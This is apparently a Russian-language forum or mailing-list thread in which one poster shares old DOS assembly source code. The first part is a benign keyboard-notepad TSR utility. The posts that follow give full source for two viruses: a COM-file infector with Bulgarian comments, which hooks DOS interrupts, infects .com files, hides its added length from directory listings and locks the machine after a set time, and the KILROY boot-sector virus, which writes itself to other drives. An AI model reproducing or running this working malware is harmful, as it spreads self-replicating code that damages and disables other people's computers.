TRIGGER_FLAG DW 0 ;Trigger on or off
FULL_FLAG DB 0 ;Buffer Full Flag
LINE DW 9 ;Line number, 0-9
SCREEN_SEG_OFFSET DW 0 ;0 for mono, 8000H for graphics
IO_CHAR DW ? ;Holds addr of Put or Get_Char
STATUS_PORT DW ? ;Video controller status port
OLD_KEYBOARD_INT DD ? ;Location of old kbd interrupt
FINISHED_FLAG DB 1 ;If not finished,f buffer
COMMAND_INDEX DW 1 ;Stores positior timer)
ROM_TIMER DD 1 ;The Timer interrupt's address
OLD_HEAD DW 0

KEEPER PROC NEAR ;The keyboard interrupt will now come here.
ASSUME CS:CODE_SEG
PUSH AX ;Save the used registers for good form
PUSH BX
PUSH CX
PUSH DX
PUSH DI
PUSH SI
PUSH DS
PUSH ES
PUSHF ;First, call old keyboard interrupt
CALL OLD_KEYBOARD_INT
ASSUME DS:ROM_BIOS_DATA ;Examine the char just put in
MOV BX,ROM_BIOS_DATA
MOV DS,BX
MOV BX,TAIL ;Point to current tail
CMP BX,HEAD ;If at head, kbd int has deleted char
JE BYE ;So leave
MOV DX,HEAD
SUB DX,2 ;Point to just read in character
CMP DX,OFFSET BUFFER ;Did we undershoot buffer?
JAE NOWRAP ;Nope
MOV DX,OFFSET BUFFER_END ;Yes -- move to buffer top
SUB DX,2 ;Compare two bytes back from head
NOWRAP: CMP DX,TAIL ;If it's the tail, buffer is full
JNE NOTFULL ;We're OK, jump to NotFull
CMP FULL_FLAG,1 ;Check if keyboard buffer full
JE BYE ;Yep, leave
MOV FULL_FLAG,1 ;Oops, full, set flag and take
JMP CHK ; this last character
NOTFULL:MOV FULL_FLAG,0 ;Always reset Full_Flag when buff
clears
CHK: CMP TRIGGER_FLAG,0 ;Is the window on (triggered?)
JNE SUBT ;Yep, keep going
MOV DX,OLD_HEAD ;Check position of buffer head
CMP DX,HEAD
JNE CONT
MOV OLD_HEAD,0
BYE: JMP OUT
CONT: MOV DX,HEAD
MOV OLD_HEAD,DX
SUBT: SUB BX,2 ;Point to just read in character
CMP BX,OFFSET BUFFER ;Did we undershoot buffer?
JAE NO_WRAP ;Nope
MOV BX,OFFSET BUFFER_END ;Yes -- move to buffer top
SUB BX,2 ;
NO_WRAP:MOV DX,[BX] ;Char in DX now
;------ CHAR IN DX NOW -------
CMP FINISHED_FLAG,0
JE IN
CMP DX,310EH ;Default trigger is a ^N here.
JNE NOT_TRIGGER ;No
MOV TAIL,BX
NOT TRIGGER_FLAG ;Switch Modes
CMP TRIGGER_FLAG,0 ;Trigger off?
JNE TRIGGER_ON ;No, only other choice is on
TRIGGER_OFF:
MOV OLD_HEAD,0 ;Reset old head
MOV AH,OLD_ATTRIBUTE ;Get ready to restore screen
MOV ATTRIBUTE,AH ;Pad and blinking line set to orig.
MOV LINE_ATTRIBUTE,AH ; values
MOV PAD_OFFSET,10*102 ;Point to 2nd half of pad
LEA AX,PUT_CHAR ;Make IO call Put_Char as it scans
MOV IO_CHAR,AX ;over all locations in pad on screen
CALL IO ;Restore screen
CMP LINE,9 ;Was the window turned off without
JE IN ; using up-down keys? If so, exit
MOV AX,LINE ;No, there is a line to stuff in
MOV CL,102 ; keyboard buffer
MUL CL ;Find its location in Pad
MOV COMMAND_INDEX,AX ;And send to Put
CALL PUT ;Which will do actual stuffing
IN: JMP OUT ;Done
TRIGGER_ON: ;Window just turned on
MOV LINE,9 ;Set blinking line to bottom
MOV PAD_OFFSET,10*102 ;Point to screen storage part of pad
LEA AX,GET_CHAR ;Make IO use Get_char so current screen
MOV IO_CHAR,AX ;is stored
CALL IO ;Store Screen
CALL DISPLAY ;And put up the pad
JMP OUT ;Done here.
NOT_TRIGGER:
TEST TRIGGER_FLAG,1 ;Is Trigger on?
JZ RUBOUT_TEST
MOV TAIL,BX ;Yes, delete this char from buffer
UP: CMP DX,4800H ;An Up cursor key?
JNE DOWN ;No, try Down
DEC LINE ;Move blinker up one line
CMP LINE,0 ;At top? If so, reset
JGE NOT_TOP
MOV LINE,9
NOT_TOP:CALL DISPLAY ;Display result
JMP OUT ;And leave
DOWN: CMP DX,5000H ;Perhaps Down cusor key pushed
JNE IN ;If not, ignore key
INC LINE ;If so, move down one
CMP LINE,9 ;If at bottom, wrap to top
JLE NOT_BOT
MOV LINE,0
NOT_BOT:CALL DISPLAY ;Show results
JMP OUT ;And exit
RUBOUT_TEST:
CMP DX,0E08H ;Is it a Rubout?
JNE CHAR_TEST ;No -- try carriage return-line feed
MOV BX,PAD_CURSOR ;Yes -- get current pad location
CMP BX,9*102 ;Are we at beginning of last line?
JLE NEVER_MIND ;Yes -- can't rubout past beginning
SUB PAD_CURSOR,2 ;No, rubout this char
MOV PAD[BX-2],20H ;Move a space in instead (3920H)
MOV PAD[BX-1],39H
NEVER_MIND:
JMP OUT ;Done here.
CHAR_TEST:
CMP DL,13 ;Is this a carriage return?
JE PLUG ;If yes, plug this line into Pad
CMP DL,32 ;If this char < Ascii 32, delete line
JGE PLUG
MOV PAD_CURSOR,9*102 ;Clear the current line
MOV CX,51
MOV BX,9*102
CLEAR: MOV WORD PTR PAD[BX],0
ADD BX,2
LOOP CLEAR
JMP OUT ;And exit

PLUG: MOV BX,PAD_CURSOR ;Get current pad location
CMP BX,10*102-2 ;Are we past the end of the pad?
JGE CRLF_TEST ;Yes -- throw away char
MOV WORD PTR PAD[BX],DX ;No -- move ASCII code into pad
ADD PAD_CURSOR,2 ;Increment pad location
CRLF_TEST:
CMP DX,1C0DH ;Is it a carriage return-line feed?
JNE OUT ;No -- put it in the pad
CALL CRLF ;Yes -- move everything up in pad
OUT: POP ES ;Having done Pushes, here are the Pops
POP DS
POP SI
POP DI
POP DX
POP CX
POP BX
POP AX
IRET ;An interrupt needs an IRET
KEEPER ENDP

DISPLAY PROC NEAR ;Puts the whole pad on the screen
PUSH AX
MOV ATTRIBUTE,112 ;Use reverse video
MOV LINE_ATTRIBUTE,240
MOV PAD_OFFSET,0 ;Use 1st 250 bytes of pad memory
LEA AX,PUT_CHAR ;Make IO use Put-Char so it does
MOV IO_CHAR,AX
CALL IO ;Put result on screen
POP AX
RET ;Leave
DISPLAY ENDP

CRLF PROC NEAR ;This handles carriage returns
PUSH BX ;Push everything conceivable
PUSH CX
PUSH DI
PUSH SI
PUSH DS
PUSH ES
ASSUME DS:CODE_SEG ;Set DS to Code_Seg here
PUSH CS
POP DS
ASSUME ES:CODE_SEG ;And ES too
PUSH DS
POP ES
LEA DI,PAD ;Get ready to move contents of Pad
MOV SI,DI ; up one line
ADD SI,102 ;DI-top line, SI-one below top line
MOV CX,9*51
MOV BX,PAD_CURSOR ;But first finish line with a 0
CMP BX,9*102+2 ; as a flag letting Put know line is
JE POPS ; done.
MOV WORD PTR PAD[BX],0
REP MOVSW ;Move up Pad contents
MOV CX,51 ;Now fill the last line with spaces
MOV AX,3920H
REP STOSW ;Using Stosw
POPS: MOV PAD_CURSOR,9*102 ;And finally reset Cursor to beginning
POP ES ; of the last line again.
POP DS
POP SI
POP DI
POP CX
POP BX
DONE: RET ;And out.
CRLF ENDP

GET_CHAR PROC NEAR ;Gets a char from screen and advances position
ASSUME ES:SCREEN,DS:ROM_BIOS_DATA
PUSH DX
MOV SI,2 ;Loop twice, once for char, once for attribute
MOV DX,STATUS_PORT ;Get ready to read video controller status
G_WAIT_LOW: ;Start waiting for a new horizontal scan -
IN AL,DX ;Make sure the video controller scan status
TEST AL,1 ;is low
JNZ G_WAIT_LOW
G_WAIT_HIGH: ;After port has gone low, it must go high
IN AL,DX ;before it is safe to read directly from
TEST AL,1 ;the screen buffer in memory
JZ G_WAIT_HIGH
MOV AH,ES:[DI] ;Do the move from the screen, one byte at a
time
INC DI ;Move to next screen location
DEC SI ;Decrement loop counter
CMP SI,0 ;Are we done?
JE LEAVE ;Yes
MOV PAD[BX],AH ;No -- put char we got into the pad
JMP G_WAIT_LOW ;Do it again
LEAVE: MOV OLD_ATTRIBUTE,AH
ADD BX,2
POP DX
RET
GET_CHAR ENDP

PUT_CHAR PROC NEAR ;Puts one char on screen and advances position
PUSH DX
MOV AH,PAD[BX] ;Get the char to be put onto the screen
CMP AH,32
JAE GO
MOV AH,32
GO: MOV SI,2 ;Loop twice, once for char, once for attribute
MOV DX,STATUS_PORT ;Get ready to read video controller status
P_WAIT_LOW: ;Start waiting for a new horizontal scan -
IN AL,DX ;Make sure the video controller scan status
TEST AL,1 ;is low
JNZ P_WAIT_LOW
P_WAIT_HIGH: ;After port has gone low, it must go high
IN AL,DX ;before it is safe to write directly to
TEST AL,1 ;the screen buffer in memory
JZ P_WAIT_HIGH
MOV ES:[DI],AH ;Move to screen, one byte at a time
MOV AH,ATTRIBUTE ;Load attribute byte for second pass
INC DI ;Point to next screen postion
DEC SI ;Decrement loop counter
JNZ P_WAIT_LOW ;If not zero, do it one more time
ADD BX,2
POP DX
RET ;Exeunt
PUT_CHAR ENDP

IO PROC NEAR ;This scans over all screen positions of the
pad
ASSUME ES:SCREEN ;Use screen as extra segment
MOV BX,SCREEN
MOV ES,BX

PUSH DS
MOV BX,ROM_BIOS_DATA
MOV DS,BX
MOV BX,4AH
MOV BX,DS:[BX]
SUB BX,51
ADD BX,BX
MOV FIRST_POSITION,BX
POP DS

MOV DI,SCREEN_SEG_OFFSET ;DI will be pointer to screen postion
ADD DI,FIRST_POSITION ;Add width of screen minus pad width
MOV BX,PAD_OFFSET ;BX will be pad location pointer
MOV CX,10 ;There will be 10 lines

LINE_LOOP:
PUSH WORD PTR ATTRIBUTE
PUSH CX ;Figure out whether this is blinking
NEG CX ; line and if so, temporarily change
ADD CX,10 ; display attribute
CMP CX,LINE
JNE NOLINE
MOV CL,LINE_ATTRIBUTE
MOV ATTRIBUTE,CL
NOLINE: POP CX
MOV DX,51 ;And 51 spaces across
CHAR_LOOP:
CALL IO_CHAR ;Call Put-Char or Get-Char
DEC DX ;Decrement character loop counter
JNZ CHAR_LOOP ;If not zero, scan over next character
ADD DI,FIRST_POSITION ;Add width of screen minus pad width

POP WORD PTR ATTRIBUTE
LOOP LINE_LOOP ;And now go back to do next line
RET ;Finished
IO ENDP

PUT PROC NEAR ;Here it is.
ASSUME DS:ROM_BIOS_DATA ;Free DS
PUSH DS ;Save all used registers
PUSH SI
PUSH DI
PUSH DX
PUSH CX
PUSH BX
PUSH AX
MOV AX,ROM_BIOS_DATA ;Just to make sure
MOV DS,AX ;Set DS correctly
FIN: MOV FINISHED_FLAG,1 ;Assume we'll finish
MOV BX,TAIL ;Prepare to move to buffer's tail
MOV SI,COMMAND_INDEX ;Get our source index

STUFF: MOV AX,WORD PTR PAD[SI]
ADD SI,2 ;Point to the command's next character
CMP AX,0 ;Is it a zero? (End of command)
JE NO_NEW_CHARACTERS ;Yes, leave with Finished_Flag=1
MOV DX,BX ;Find position in buffer from BX
ADD DX,2 ;Move to next position for this word
CMP DX,OFFSET BUFFER_END ;Are we past the end?
JL NO_WRAP2 ;No, don't wrap
MOV DX,OFFSET BUFFER ;Wrap
NO_WRAP2:
CMP DX,HEAD ;Buffer full but not yet done?
JE BUFFER_FULL ;Time to leave, set Finished_Flag=0.
ADD COMMAND_INDEX,2 ;Move to next word in command
MOV [BX],AX ;Put it into the buffer right here.
ADD BX,2 ;Point to next space in buffer
CMP BX,OFFSET BUFFER_END ;Wrap here?
JL NO_WRAP3 ;No, readjust buffer tail
MOV BX,OFFSET BUFFER ;Yes, wrap
NO_WRAP3:
MOV TAIL,BX ;Reset buffer tail
JMP STUFF ;Back to stuff in another character.
BUFFER_FULL: ;If buffer is full, let timer take over
MOV FINISHED_FLAG,0 ; by setting Finished_Flag to 0.
NO_NEW_CHARACTERS:
POP AX ;Restore everything before departure.
POP BX
POP CX
POP DX
POP DI
POP SI
POP DS
STI
RET
PUT ENDP

ASSUME DS:CODE_SEG
INTERCEPT_TIMER PROC NEAR ;This completes filling the buffer
PUSHF ;Store used flags
PUSH DS ;Save DS since we'll change it
PUSH CS ;Put current value of CS into DS
POP DS
CALL ROM_TIMER ;Make obligatory call
PUSHF
CMP FINISHED_FLAG,1 ;Do we have to do anything?
JE OUT1 ;No, leave
CLI ;Yes, start by clearing interrupts
PUSH DS ;Save these.
PUSH SI
PUSH DX
PUSH BX
PUSH AX
ASSUME DS:ROM_BIOS_DATA ;Point to the keyboard buffer again.
MOV AX,ROM_BIOS_DATA
MOV DS,AX
MOV BX,TAIL ;Prepare to put characters in at tail
MOV FINISHED_FLAG,1 ;Assume we'll finish
MOV SI,COMMAND_INDEX ;Find where we left ourselves

STUFF2: MOV AX,WORD PTR PAD[SI] ;The same stuff loop as above.
ADD SI,2 ;Point to next command character.
CMP AX,0 ;Is it zero? (end of command)
JNE OVER ;No, continue.
JMP NO_NEW_CHARACTERS2 ;Yes, leave with Finished_Flag=1
OVER: MOV DX,BX ;Find position in buffer from BX
ADD DX,2 ;Move to next position for this word
CMP DX,OFFSET BUFFER_END ;Are we past the end?
JL NO_WRAP4 ;No, don't wrap
MOV DX,OFFSET BUFFER ;Do the Wrap rap.
NO_WRAP4:
CMP DX,HEAD ;Buffer full but not yet done?
JE BUFFER_FULL2 ;Time to leave, come back later.
ADD COMMAND_INDEX,2 ;Point to next word of command.
MOV [BX],AX ;Put into buffer
ADD BX,2 ;Point to next space in buffer
CMP BX,OFFSET BUFFER_END ;Wrap here?
JL NO_WRAP5 ;No, readjust buffer tail
MOV BX,OFFSET BUFFER ;Yes, wrap
NO_WRAP5:
MOV TAIL,BX ;Reset buffer tail
JMP STUFF2 ;Back to stuff in another character
BUFFER_FULL2:
MOV FINISHED_FLAG,0 ;Set flag to not-done-yet.
NO_NEW_CHARACTERS2:
POP AX ;Restore these.
POP BX
POP DX
POP SI
POP DS
OUT1: POPF ;And Exit.
POP DS
IRET ;With customary IRET
INTERCEPT_TIMER ENDP

LOAD_KEEPER PROC NEAR ;This procedure intializes everything
ASSUME DS:VECTORS ;The data segment will be the Interrupt area
MOV AX,VECTORS
MOV DS,AX

MOV AX,KEYBOARD_INT ;Get the old interrupt service routine
MOV OLD_KEYBOARD_INT,AX ;address and put it into our location
MOV AX,KEYBOARD_INT[2] ;OLD_KEYBOARD_INT so we can call it.
MOV OLD_KEYBOARD_INT[2],AX

MOV KEYBOARD_INT,OFFSET KEEPER ;Now load the address of our
notepad
MOV KEYBOARD_INT[2],CS ;routine into the keyboard interrupt

MOV AX,TIMER_VECTOR ;Now same for timer
MOV ROM_TIMER,AX
MOV AX,TIMER_VECTOR[2]
MOV ROM_TIMER[2],AX

MOV TIMER_VECTOR,OFFSET INTERCEPT_TIMER
MOV TIMER_VECTOR[2],CS ;And intercept that too.

ASSUME DS:ROM_BIOS_DATA
MOV AX,ROM_BIOS_DATA
MOV DS,AX
MOV BX,OFFSET BUFFER ;Clear the keyboard buffer.
MOV HEAD,BX
MOV TAIL,BX
MOV AH,15 ;Ask for service 15 of INT 10H
INT 10H ;This tells us how display is set up
MOV STATUS_PORT,03BAH ;Assume this is a monochrome display
TEST AL,4 ;Is it?
JNZ EXIT ;Yes - jump out
MOV SCREEN_SEG_OFFSET,8000H ;No - set up for graphics display
MOV STATUS_PORT,03DAH

EXIT: MOV DX,OFFSET LOAD_KEEPER ;Set up everything but LOAD_PAD to
INT 27H ;stay and attach itself to DOS
LOAD_KEEPER ENDP

CODE_SEG ENDS

END FIRST ;END "FIRST" so 8088 will go to FIRST first.

Hу я вроде все сказал... Может еще что добавлю потом...
[√] Пока _All_ !

▌║▐║│║▌║││║║ DreamLand laboratory. P2Pirates<dog>Mail.ru ICQ 638-547-576
2║5080▌244║0 FTP://87.224.224.182

... Ёж птица гордая. Пока не пнешь - не полетит!

John Zaicev

unread,

May 14, 2012, 2:42:04 AM5/14/12

to

... ًدةحإج قإسشط, ذدةحإت ة سد×إسشط خءثدخإأ.

John Zaicev

unread,

May 15, 2012, 2:13:45 AM5/15/12

to

[√] Привет _All_ !

;************************************************************************;
;* Tози Virus е нап░авен на 25.10.1991 г. в *;
;* *;
;* СУ " Св. Климен▓ О╡░ид▒ки " в 17:18.30 hour *;
;* *;
;* ▒▓а┐ 316 на Ф.М.И. *;
;************************************************************************;

start: jmp short begin
db (00h)
db (53h) ; За ░азпознаване на ви░│▒а
db (4bh) ; Дали ┤айла е за░азен
int 20h
okey: db (0b8h)
db (03h)
db (00h)
db (0cdh)
db (10h)

begin: push cx ;
CALL F1 ;
F1: POP SI ; За в║з▒▓анов┐ване на п║░ви▓е 5 бай▓а
SUB SI,09 ;
PUSH SI ;
cld ;
mov di,100h ;
mov cx,5 ;
rep movsb ;
jmp ding2

new21: pushf ; CALL к║м о░игинално▓о INT 21h на
push cs ; IBMDOS.COM - ▒ Єел да не ▓е ╡ва-
call Word ptr cs:[8c0h] ; на▓ н┐кой п░ог░ами за ви░│▒и
ret ; ка▓о Anti4us.exe, NDD и ▓.н.

int21h: STI
cmp ah,4bh ; П░и ▒▓а░▓и░ане на ┤айл
jz mm ;
cmp ah,11h ; П░и ▓║░▒ене на п║░ви и в▓о░и ┤айл
jz home ; ▒ Єел п░и DIR да ▒к░ива ви░│▒а.
cmp ah,12h ;
jz home
jmp int1hh

home: call new21 ; П░оЄед│░а ка▓о п░и DIR п░ове░┐ва
push ax ; дали їа▒а е 10:26 и ,ако е знаїи
push bx ; ┤айла е за░азен и изважда д║лжина-
push es ; ▓а на ви░│▒а да не ▒е забел┐зва
; оголем┐ване▓о на ┤айла.
mov ah,2fh ; Взема DTA в ES:BX . Ча▒а е в bx+1eh
call new21 ; Т│к е 10:26 ;
mov ax,534bh
cmp Word ptr es:[bx+1eh],ax
jnz ox
mov ax,End-Okey+3
sub Word ptr es:[bx+24h],ax
ox: pop es ; Ако не е 10:26 , ▓о знаїи н┐маі
pop bx ; ви░│▒ и н┐ма да намали їа▒а ▒
pop ax ; необ╡одими▓е бай▓ове или д║л-
db (0CAh) ; жина▓а на ви░│▒а в ▒л│їе┐.
dw (2)

;****************************************************;
;* З а ░ а з ┐ в а н е *;
;****************************************************;

mm: pushf
PUSH AX

PUSH BX
PUSH CX
PUSH DX

PUSH DS
PUSH ES
PUSH SI
PUSH DI
xor ax,ax
mov ds,ax
mov di,[0194h]
mov es,[0196h]
mov ax,[004ch]
mov bx,[004eh]
mov cx,0f000h
mov dx,0ec59h
mov [0100h],dx
mov [0102h],cx
mov [0198h],ax
mov [019ah],bx
mov [004ch],di
mov [004eh],es
mov ax,0a15h+new24-begin
push cs
pop ds
push cs
pop es
mov ah,2ch
call new21
cmp cx,0200h
jna mm1
mov ax,0003h
int 10h
mov ah,09h
mov dx,0a15h+n-begin
call new21
cli
hlt

dinge: jmp ding

mm1: mov ah,2fh ;Dos service function ah=2FH (get DTA)
call new21
mov cs:[8b0h],es
mov cs:[8b2h],bx
MOV AH,4eH
MOV DX,0a10h+files-okey
mov cx,0
call new21
jc dinge ;CX File attribute
;DS:DX Pointer of filespec (ASCIIZ string)
vir: mov ax,534bh
cmp es:[bx+16h],ax
jnz fuck
vir1: mov ah,4fh
call new21
jc enzi
jmp short vir
enzi: jmp ding
fuck: mov cx,1500
cmp es:[bx+1ah],cx
jna vir1
fuck1: push es
pop ds
mov ax,3d02h
mov dx,bx
add dx,1eh
call new21
mov cs:[0a10h+handle-okey],ax
mov bx,ax
push cs
pop ds
mov ah,3fh
mov dx,0a10h
mov cx,5
call new21
mov di,0a10h+end-okey
mov al,0e9h
mov [di],al
inc di
mov bx,[8b2h]
mov cx,es:[bx+1ah]
inc cx
inc cx
mov [di],cx
inc di
inc di
mov ax,534bh
mov [di],ax
mov bx,cs:[0a10h+handle-okey]
mov ax,4200h
xor cx,cx
xor dx,dx
call new21
mov ah,40h
mov dx,0a10h+end-okey
mov cx,5
call new21
mov ax,4202h
xor cx,cx
xor dx,dx
call new21
push cs
pop ds
mov bx,cs:[0a10h+handle-okey]
mov ah,40h
mov dx,0a10h
mov cx,end-okey-3
call new21
mov bx,cs:[0a10h+handle-okey]
mov ax,5700h
call new21
mov ax,5701h
mov cx,534bh
call new21
mov ah,3eh
call new21
ding: xor ax,ax
mov ds,ax
mov ax,[0198h]
mov bx,[019ah]
mov [004ch],ax
mov [004eh],bx
POP DI
POP SI
POP ES
POP DS

POP DX
POP CX
POP BX
POP AX

popf

int1hh: jmp word ptr cs:[8c0h] ; П░ек║▒ване 21H

files: db '*.com',0 ; За░аз┐ва ▒амо COM ┤айлове

new24: mov al,03 ; Int 24h да не дава Write Protect
iret

ding2: MOV AX,0070h ; Влиза в ▒егмен 0070h: и п░е▓║░▒ва
MOV ES,AX ; за необ╡одими▓е бай▓ове на INT13H
MOV DI,0000h
MOV AX,80FBh
non1: CLD
MOV CX,0FFFFh
non2: REPNZ SCASW
JZ non
MOV DI,0001h
JMP non1
non: MOV BX,02FCh
CMP ES:[DI],BX
JNZ non2
DEC DI
DEC DI
xor ax,ax ; Hагла▒┐ ново▓о п░ек║▒ване INT13H и
mov ds,ax ; и ▒е подго▓в┐ за ░або▓а
mov [0194h],di
mov [0196h],es
mov es,[009eh]
mov bx,[00a0h]
push cs
pop ds
MOV BP,DS
pop si
push si ; П░е╡в║░л┐ ви░│▒а в ▒▓ека на
MOV DI,0a10h ; COMMAND.COM
MOV CX,Handle-Okey ; А ▒║╣о ▓ака и подго▓в┐
REP MOVSB ; ви░│▒а доб░е да ▒е │к░епи
PUSH ES ; и опле▓е ▒ Int 21h
LEA DI,[BX+1bh]
MOV AL,0e9h
STOSB
MOV AX,0A30h
SUB AX,DI
STOSW
MOV AX,9090H
STOSW
STOSW
MOV ES:[8c0h],DI
MOV AX,SS
SUB AX,0018h
CLI
MOV SS,AX
STI
MOV DS,BP
POP ES
pop si
pop cx
xor ax,ax
xor bx,bx
xor dx,dx
xor si,si
mov di,100h
push di
xor di,di
ret
n: db "K.I.I.S.° ",024h ; Този ▓е▒▓ ▒е о▓пеїа▓ва ▒лед 2 їа▒а.
handle: dw ? ; А ▒║╣о ▓ака блоки░а комп╛▓║░а.
end: db (00)

Hу я вроде все сказал... Может еще что добавлю потом...
[√] Пока _All_ !

▌║▐║│║▌║││║║ DreamLand laboratory. P2Pirates<dog>Mail.ru ICQ 638-547-576
2║5080▌244║0 FTP://87.224.224.182

... Дети - цветы жизни. Дарите женщинам цветы!

John Zaicev

unread,

May 15, 2012, 2:14:32 AM5/15/12

to

[√] Привет _All_ !

;The KILROY one-sector boot sector virus will both boot up either MS-DOS or
;PC-DOS and it will infect other disks.

;This segment is where the first operating system file (IBMBIO.COM or IO.SYS)
;will be loaded and executed from. We don't know (or care) what is there, but
;we do need the address to jump to defined in a separate segment so we can
;execute a far jump to it.
DOS_LOAD SEGMENT AT 0070H
ASSUME CS:DOS_LOAD

ORG 0

LOAD: DB 0 ;Start of the first operating system
program

DOS_LOAD ENDS

MAIN SEGMENT BYTE
ASSUME CS:MAIN,DS:MAIN,SS:NOTHING

;This jump instruction is just here so we can compile this program as a COM
;file. It is never actually executed, and never becomes a part of the boot
;sector. Only the 512 bytes after the address 7C00 in this file become part of
;the boot sector.
ORG 100H

START: jmp BOOTSEC

;The following two definitions are BIOS RAM bytes which contain information
;about the number and type of disk drives in the computer. These are needed by
;the virus to decide on where to look to find drives to infect. They are not
;normally needed by an ordinary boot sector.

ORG 0410H

SYSTEM_INFO: DB ? ;System info byte: Take bits 6
& 7 and add 1 to get number of
;disk drives on this system (eg
01 = 2 drives)

ORG 0475H

HD_COUNT: DB ? ;Number of hard drives in the
system

;This area is reserved for loading the boot sector from the disk which is going
;to be infected, as well as the first sector of the root directory, when
;checking for the existence of system files and loading the first system file.

ORG 0500H

DISK_BUF: DW ? ;Start of the buffer

ORG 06FEH

NEW_ID: DW ? ;Location of AA55H in boot
sector loaded at DISK_BUF

;Here is the start of the boot sector code. This is the chunk we will take out
;of the compiled COM file and put it in the first sector on a 360K floppy disk.
;Note that this MUST be loaded onto a 360K floppy to work, because the
;parameters in the data area that follow are set up to work only with a 360K
;disk!

ORG 7C00H

BOOTSEC: JMP BOOT ;Jump to start of boot sector
code

ORG 7C03H ;This is needed because the
jump will get coded as 2 bytes

DOS_ID: DB 'KILROY ' ;Name of this boot sector (8
bytes)
SEC_SIZE: DW 200H ;Size of a sector, in bytes
SECS_PER_CLUST: DB 02 ;Number of sectors in a cluster
FAT_START: DW 1 ;Starting sector for the first
File Allocation Table (FAT)
FAT_COUNT: DB 2 ;Number of FATs on this disk
ROOT_ENTRIES: DW 70H ;Number of root directory
entries
SEC_COUNT: DW 2D0H ;Total number of sectors on
this disk
DISK_ID: DB 0FDH ;Disk type code (This is 360KB)
SECS_PER_FAT: DW 2 ;Number of sectors per FAT
SECS_PER_TRK: DW 9 ;Sectors per track for this
drive
HEADS: DW 2 ;Number of heads (sides) on
this drive
HIDDEN_SECS: DW 0 ;Number of hidden sectors on
the disk

DSKBASETBL:
DB 0 ;Specify byte 1: step rate
time, head unload time
DB 0 ;Specify byte 2: Head load
time, DMA mode
DB 0 ;Wait time until motor turned
off, in clock ticks
DB 0 ;Bytes per sector (0=128,
1=256, 2=512, 3=1024)
DB 12H ;Last sector number (we make it
large enough to handle 1.2/1.44 MB floppies)
DB 0 ;Gap length between sectors for
r/w operations, in bytes
DB 0 ;Data transfer length when
sector length not specified
DB 0 ;Gap length between sectors for
format operations, in bytes
DB 0 ;Value stored in newly
formatted sectors
DB 1 ;Head settle time, in
milliseconds (we set it small to speed operations)
DB 0 ;Motor startup time, in 1/8
seconds

HEAD: DB 0 ;Current head to read from
(scratch area used by boot sector)

;Here is the start of the boot sector code

BOOT: CLI ;interrupts off
XOR AX,AX ;prepare to set up
segments
MOV ES,AX ;set ES=0
MOV SS,AX ;start stack at
0000:7C00
MOV SP,OFFSET BOOTSEC
MOV BX,1EH*4 ;get address of disk
LDS SI,SS:[BX] ;param table in ds:si
PUSH DS
PUSH SI ;save that address
PUSH SS
PUSH BX ;and its address

MOV DI,OFFSET DSKBASETBL ;and update default
MOV CX,11 ;values to the table
stored here
CLD ;direction flag cleared
DFLT1: LODSB
CMP BYTE PTR ES:[DI],0 ;anything non-zero
JNZ SHORT DFLT2 ;is not a default, so
don't save it
STOSB ;else put default value
in place
JMP SHORT DFLT3 ;and go on to next
DFLT2: INC DI
DFLT3: LOOP DFLT1 ;and loop until cx=0

MOV AL,AH ;set ax=0
MOV DS,AX ;set ds=0 so we can set
disk tbl
MOV WORD PTR [BX+2],AX ;to @DSKBASETBL (ax=0
here)
MOV WORD PTR [BX],OFFSET DSKBASETBL ;ok, done
STI ;now turn interrupts on
INT 13H ;and reset disk drive
system
ERROR1: JC ERROR1 ;if an error, hang the
machine

;Attempt to self reproduce. If this boot sector is located on drive A, it will
;attempt to relocate to drive C. If successful, it will stop, otherwise it will
;attempt to relocate to drive B. If this boot sector is located on drive C, it
;will attempt to relocate to drive B.
SPREAD:
CALL DISP_MSG ;Display the "Kilroy
was here!" message
MOV BX,OFFSET DISK_BUF ;read other boot
sectors into this buffer
CMP BYTE PTR [DRIVE],80H
JZ SPREAD2 ;if it's C, go try to
spread to B
MOV DX,180H ;if it's A, try to
spread to C first, try Head 1
CMP BYTE PTR [HD_COUNT],0 ;see if there is a hard
drive
JZ SPREAD2 ;none - try floppy B
MOV CX,1 ;read Track 0, Sector 1
MOV AX,201H
INT 13H
JC SPREAD2 ;on error, go try drive
B
CMP WORD PTR [NEW_ID],0AA55H ;make sure it really is
a boot sector
JNZ SPREAD2
CALL MOVE_DATA
MOV DX,180H ;and go write the new
sector
MOV CX,1
MOV AX,301H
INT 13H
JC SPREAD2 ;if an error writing to
C:, try infecting B:
JMP SHORT LOOK_SYS ;if no error, go look
for system files
SPREAD2: MOV AL,BYTE PTR [SYSTEM_INFO] ;first see if there is
a B drive
AND AL,0C0H
ROL AL,1 ;put bits 6 & 7 into
bits 0 & 1
ROL AL,1
INC AL ;add one, so now AL=#
of drives
CMP AL,2
JC LOOK_SYS ;no B drive, just quit
MOV DX,1 ;read drive B
MOV AX,201H ;read one sector
MOV CX,1 ;read Track 0, Sector 1
INT 13H
JC LOOK_SYS ;if an error here, just
exit
CMP WORD PTR [NEW_ID],0AA55H ;make sure it really is
a boot sector
JNZ LOOK_SYS ;no, don't attempt
reproduction
CALL MOVE_DATA ;yes, move this boot
sector in place
MOV DX,1
MOV AX,301H ;and write this boot
sector to drive B
MOV CX,1
INT 13H

;Here we look at the first file on the disk to see if it is the first MS-DOS or
;PC-DOS system file, IO.SYS or IBMBIO.COM, respectively.
LOOK_SYS:
MOV AL,BYTE PTR [FAT_COUNT] ;get fats per disk
XOR AH,AH
MUL WORD PTR [SECS_PER_FAT] ;multiply by sectors
per fat
ADD AX,WORD PTR [HIDDEN_SECS] ;add hidden sectors
ADD AX,WORD PTR [FAT_START] ;add starting fat
sector

PUSH AX
MOV WORD PTR [DOS_ID],AX ;root dir, save it

MOV AX,20H ;dir entry size
MUL WORD PTR [ROOT_ENTRIES] ;dir size in ax
MOV BX,WORD PTR [SEC_SIZE] ;sector size
ADD AX,BX ;add one sector
DEC AX ;decrement by 1
DIV BX ;ax=# sectors in root
dir
ADD WORD PTR [DOS_ID],AX ;DOS_ID=start of data
MOV BX,OFFSET DISK_BUF ;set up disk read
buffer at 0000:0500
POP AX
CALL CONVERT ;and go convert
sequential sector number to bios data
MOV AL,1 ;prepare for a disk
read for 1 sector
CALL READ_DISK ;go read it

MOV DI,BX ;compare first file on
disk with
MOV CX,11 ;required file name
MOV SI,OFFSET SYSFILE_1 ;of first system file
for PC DOS
REPZ CMPSB
JZ SYSTEM_THERE ;ok, found it, go load
it

MOV DI,BX ;compare first file
with
MOV CX,11 ;required file name
MOV SI,OFFSET SYSFILE_2 ;of first system file
for MS DOS
REPZ CMPSB
ERROR2: JNZ ERROR2 ;not the same - an
error, so hang the machine

